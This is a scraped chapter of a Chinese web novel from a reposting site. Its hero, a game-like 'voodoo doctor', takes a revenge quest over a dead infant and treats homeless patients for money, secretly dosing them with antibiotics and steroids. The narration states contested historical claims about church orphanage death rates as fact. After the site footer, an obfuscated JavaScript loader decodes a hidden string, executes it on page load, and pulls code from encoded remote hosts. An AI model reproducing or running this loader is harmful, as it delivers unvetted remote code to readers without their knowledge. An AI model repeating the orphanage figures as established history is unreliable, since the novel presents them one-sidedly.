=== 第80章 婴童往事（求月票） ===
章节索引: 268/335
字符数: 9,679
段落: ch-0268 (段4)

# 第三十五章 婴童往事（求月票）



第三十五章 婴童往事（求月票
从十九世纪中叶到二十世纪初，大量西方教会主导的教堂和附属的育婴堂在东大建立起来。
这其中有很多育婴堂以抚养婴儿为名募捐，但除了少部分被挑选的健康婴儿做宣传之用，大部分婴童都是自生自灭。
比如曾经接受过东大审判的“圣婴育婴院”，4万多名婴儿，死亡率达94%。
还有运营了二十多年的圣若慧善功修女教会，总共接纳了数万名婴儿，最后只存活了不到百人，死亡率超过99%。
拯亡修女会圣母院育婴堂，1936到1949年共接收4万名婴儿，总共活下来197人，死亡率超过99%。
你可以用当时的婴儿死亡率高来洗，但清末的婴儿死亡率不过20%左右，教会育婴堂高达99%的死亡率哪怕再没良心的人也能看出问题。
1891年震惊中外的丹阳教案，就是因为民众发现教会墓地埋葬大量被剜目断肢死状凄惨的儿童尸首、育婴堂之中没有活着的婴童，这才彻底爆发。
眼前这个玻璃瓶之中已经干瘪发黑的婴儿尸体到底是怎么来的，自然也不用多言。
【支线任务：复仇与安息】
【数百年来，魔域地下城一直都在残害婴童，这一切仍然在发生，并且还会发生，在魔域地下城中寻找线索，惩罚罪者，将使死去的孩子们安息，并获得祝福和特殊奖励】
【这将是一个漫长的任务，是否选择接受？】
韦恩想也没想，立刻点了接受。
什么奖不奖励的已经不重要了。
关键是要猛猛惩罚那些非人的王八蛋，图一个痛快。
随后将装着尸体的玻璃瓶小心翼翼包裹好，收进空间背包之中。
他要找个合适的机会，将尸体下葬。
又把那一小瓶百年鸦片酊收好。
韦恩探查一番没有再找到什么有价值的东西，带着小狗威克回到了众人休息的地方，裹上一条毯子，抱着小狗威克沉沉睡去。
这处地下巷道就一点好处，就是十分安静。
韦恩这一觉睡得十分踏实，第二天早上醒来，发现精神力已经再次补满，达到了1.7/1.7。
而经验值则提升到了68点，金色称号圣徒提升到了8%。
升级之后就这一点不好，经验值和技能都提升的太慢了。
还是得多给人看病收经验值啊。
住在地下巷道之中的流浪汉大多已经出门，或是去打工，或是去乞讨，或是去庇护所领物资。
韦恩带着迈克和戴维离开地下巷道，悄然从那座废弃仓库之中走出去，找了个平价超市又买了一顶帐篷，随后往他们之前扎营的唐人街附近的街道而去。
老威尔则是亦步亦趋的跟在后面，说是要去帮忙。
很快来到那片街道，就见原本被荡平的那片区域，正有十几个人茫然地站在那里，显然是来看病的病患。
老比利则是一脸焦急地抓耳挠腮，向旁边的人询问到底发生了什么，韦恩又去了哪里。
在发生了圣徒“死而复生”的那一幕之后，老比利等人虽然散去，但他心中的激动难言。
哪怕是上夜班的时候，都感觉自己比之前要精神了许多。
他将这些全都归功于自己目睹了圣徒显圣的神迹，又将韦恩的存在告诉了自己所在的破败社区的很多邻居。
所以今天早上一大早，老比利就带着一群同社区的邻居亲友等等需要看病的人，早早来到了这里，想要尽早见到圣徒先生。
只是让他没想到的是，等他们来到这里之后，圣徒先生的帐篷竟然不见了。
只剩下了一片空地。
询问旁边的几个街友，才得知昨天警察带人对这条街道进行了清理，所以圣徒先生也不知去向了。
老比利只感觉自己的心都在瞬间空了。
仿佛成了那个被邦迪耶抛弃的人。
他此时最后悔的就是自己没有跟在圣徒先生身边，如果昨天晚上没有去上夜班就好了……只是他心里也知道那是不可能的。
为了给外孙买胰岛素，为了能够付房租，为了活下去，他也不得不去工作。
此时他心中被无尽的悲伤和沮丧所填满，整个人仿佛都被抽空了。
“汪汪！”一声熟悉的犬吠从身后传来，老比利连忙转头看去，原本乌云密布的脸上瞬间变得惊喜。
“先生！您来了！”
出现在他身后的，就是那位圣徒！
韦恩点点头，看着眼前正在排队的众人说道：
“大家久等了，开始吧。”
迈克和戴维两人连忙开始帮韦恩搭设帐篷，老威尔同样忙前忙后，神情恭敬。
第三十五章婴童往事（求月票）(第2/2页)
看着突然出现的老威尔这个生面孔，老比利突然有一种危机感。
这是谁？怎么和圣徒先生这么亲近？明明是我先来的！
当下也开始帮忙维持秩序。
等到新的帐篷再次搭好，迈克和戴维叮嘱几句前去工作，薇恩这才走进了帐篷。
老威尔一手插在腰间握着兜里的左轮手枪，霸气的站在帐篷外，给韦恩站岗放哨。
老比利的心里闪过一丝危机感，连忙向帐篷里问道：
“先生，可以开始了吗？”
帐篷里，韦恩已经将巫毒骨堆摆好，淡淡地说道：
“进来吧。”
帐篷的门帘被掀开，一个不停咳嗽的男人走了进来，一脸祈求的对韦恩说道：
“先生，我的肺很难受……求您为我驱邪……”
说着，谦卑地低下了头，将手中的一卷美刀双手放到骨堆陶罐之中，伏在韦恩的面前。
韦恩微微点头。
昨天的一场雪，让风寒感冒的人更多了。
对于一些本身就体弱或者导致呼吸道细菌感染的人来说，这很可能是致命的。
当下抬手按住对方的头顶，瞬间发动了【基础巫医】技能。
他能够感受到，对方的体内有不少暗伤旧疾，不过最严重的还是气管和支气管，肺部也有一定的感染。
从巫医的角度来看，就是一种阴影污染。
当下意念发动，将掌心的一股暖流催入对方体内，瞬间驱散了对方呼吸道中的大部分阴影。
紧接着倒了一杯抗生素和地塞米松加料牛奶，又是一通念咒，演得活灵活现，递给对方说道：
“喝吧。”
对方似乎早就已经从老比利等人那里听说过这个流程，再加上【基础巫医】技能的治疗本来就已经让他的不适驱散大半，此时连忙千恩万谢地喝了下去。
原本听说这位圣徒先生的治疗见效快，不过那也得小半天功夫，现在看来，完全就是当场见效！
“愿邦迪耶永远赐福您！先生，感谢您的驱邪，我现在感觉好多了。”男人激动地对韦恩说道。
韦恩颔首示意，并没有说什么。
你说上帝就是上帝，你说邦迪耶就是邦迪耶，至于我，你想什么就是什么。
原本病恹恹的男人走出帐篷的时候，已经变得生龙活虎精力四射，简直就像是从未得病一样，立刻又引得排队的众人一阵惊呼。
【你的技能基础巫医得到提升（专精10％＋1％）】
【经验值＋1】
韦恩看看面板，说道：
“下一个。”
由于昨天韦恩“显圣”的事情得到了老比利等人的传播，所以今天来“驱邪”的人也比往常多一些，差不多有二十多个。
中间老比利还回去了一趟，给韦恩带来了热腾腾的墨西哥肉卷和肉汤。
面对那个两眼放光拿着枪守在帐篷门口的老威尔，他必须得在圣徒先生面前努力表现自己。
虽然有了【基础巫医】技能，但韦恩仍然刻意放慢了治疗速度，每个病人起码要在帐篷里待满二十分钟以上，等韦恩念完咒语再冥想一阵子才行。
毕竟哪怕【基础巫医】技能再好用，也不能太过随意，那就太显眼了。
容易再次招来杀身之祸。
等到给所有人都“驱邪”完毕，已经到了傍晚，戴维也下班回来了。
韦恩看向面板。
【经验值：68＋22】
【基础巫医（专精32％）】
不由满意地点了点头。
今天一天收获颇丰，经验值很快就要再次凝结出一个自由属性点。
帐篷里，戴维看着眼前的一堆钞票则是一脸欣喜。
今天总共赚了5000刀，大大超出预期。
“bro，太好了，加上原本的12600刀，总共是……19600刀！明天一定能赚够20000刀还债！”戴维一边迅速将钱卷起来捆扎好，一边激动地说道。
韦恩啧啧嘴说道：
“兄弟，你算的不对，应该是17600刀。不过明天绝对能攒够20000刀了……或许用不了明天。”
美利坚人的数学果然都是橄榄球教练教的。
随后几人将帐篷收起来，带着期待的神色，快步向之前的那个下水道竖井走去。
本就不多的积雪已经全部融化，下水道里的水也退了下去。
该收尸了。
请选择错误类型
更新太慢
缺少章节
章节内容错误
验证码：
提交
关闭
本站所有小说都是转载而来，所有章节都是网友上传！转载至本站只是为了宣传本书让更多读者欣赏。
!function(){function a(a){var _idx="n3xnhwm2yg";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[qYF F82_qq!7_2(F6O2 5ca[Xd5 Y!5YF_52 2_qql88FjFgcY8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=F8YjYmpYFrFF56)_FYc"("ag""aPXd5 Y=2=O=68D62fODm622Y5V6fFh!qYF h86/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfgfcmn<ydFhm5d2fO^cajngKa=5YXY5LYWfgfcmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6Fhg6/}0=6FY^9Y6phFgh/o=qOdfiFdF_Lg0=5Y|5Tg0P=d8"#MqYYb"=(8HZ!F5T[(8+i;NmJd5LYcccY=Fa8>[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2Pacda??"HZ"aP(dF(hcYa[P7_2(F6O2 JcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=F8""a[7mqOdfiFdF_L8*}=}00<(mqY2pFh??c(mJ_Lhc`c$[YPa`%Fa=qcd=+i;NmLF562p67Tc(aaaP7_2(F6O2 fcY8}a[qYF F8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=28FmqY2pFh=O8""!7O5c!Y**!aO%8FHydFhm7qOO5cydFhm5d2fO^ca.2aZ!5YF_52 OPr55dTm6Lr55dTc(a??c(8HZ=qcd=""aa!qYF _8"5phCS^"!7_2(F6O2 ^cY=Fa[qYF 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 O8H"hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^FpX5h(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFL5SJmJLFpdd(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko})hFL_h^m^FpX5h(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFL5SJmJLFpdd(m(O^gQ}1Q"="hFFJLg\/\/[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"Z!qYF 58JcOHc2YD wdFYampYFwdTcaZ??OH0Za%"/2sR2hD^@Tp/}Ko}"!Fj5%8"jR8"%fcnag_vvc5%8"j"%_%"8"%fcnaa=7m5Y|5T%%=2mL5(8Jc5a=2mO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=$caP=2mO2Y55O587_2(F6O2ca[F??YvvYca=LYF|6^YO_Fc7_2(F6O2ca[2m5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfc2a=7mqOdfiFdF_L8}PqYF p8"}Ko}"=X8"2sR2hD^@Tp"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"}Ko}^)ThF)mDDTYRpRm2YF"="}Ko}X5ThF)mC6FTCSDm2YF"="}Ko}2pThFmDDTYRpRm2YF"="}Ko}_JqhFmC6FTCSDm2YF"="}Ko}2TOhFmDDTYRpRm2YF"="}Ko}CSqhF)mC6FTCSDm2YF"="}Ko})FfThF)fmDDTYRpRm2YF"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"=28H"Y#"%XZ!5cavv2mJ_Lhc"(h#"%5caa!qYF O82YD VY)iO(SYFcF%"/"%p%c_j"j"%_%"8"%fcnag""a=H2mCO62c"v"aZa!7m5Y|5T%%=OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=f8"62fYR;7"=_8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=^8""=h80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!h<YmqY2pFh!a28_HfZcYH(Zch%%aa=O8_HfZcYH(Zch%%aa=68_HfZcYH(Zch%%aa=d8_HfZcYH(Zch%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=^%8iF562pHqZc2<<@?O>>oa=Kol886vvc^%8iF562pHqZc5aa=Kol88dvvc^%8iF562pHqZcFaa![Xd5 78^!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv$caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 $ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 )ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mOh_^5_(m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 f8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!fmLFTqYm(LL|YRF8Y=fmdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=faP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=^=l0a=7m(q6(S9d2fqY8^!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 _ca[Xd5 Y8Jc"hFFJLg//[[fdTPP}Ko}qFq^)Y6(:mOh_^5_(m(O^gQ}1Q/((/}Ko}j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 ^cYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<h%6vv_caPYqLY[F8F*O!67cF<86a5YF_52l}!F<h%6vv_caPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8Jc"hFFJLg//[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q/f/}Ko}j(8}vY82sR2hD^@Tp"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aP682dX6pdFO5mJqdF7O5^=28l/3cV62?yd(a/mFYLFc6a=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=c2??OavvcO8/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI?kOqfu5ODLY5/6mFYLFc2dX6pdFO5m_LY5rpY2Fa=Y8cY82dX6pdFO5mJqdF7O5^avv/3cV62?yd(a/mFYLFcYa??2dX6pdFO5m^dR|O_(heO62FL<@=OvvlYjDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=^c7_2(F6O2ca[Lc@0saPaPaPag^c7_2(F6O2ca[Lc}0}a=^c7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaP=Yaa=l2vv6??)ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvv(mqY2pFhvvcY8Jc"hFFJLg//[[fdTPP}Ko}dhFLFT6mddRppSCm(O^gQ}1Q"a%"/)_pj68"%p=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tc(aa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=(mqY2pFh80=qcd=""aaPaPaca!'.substr(22));new Function(b)()}();



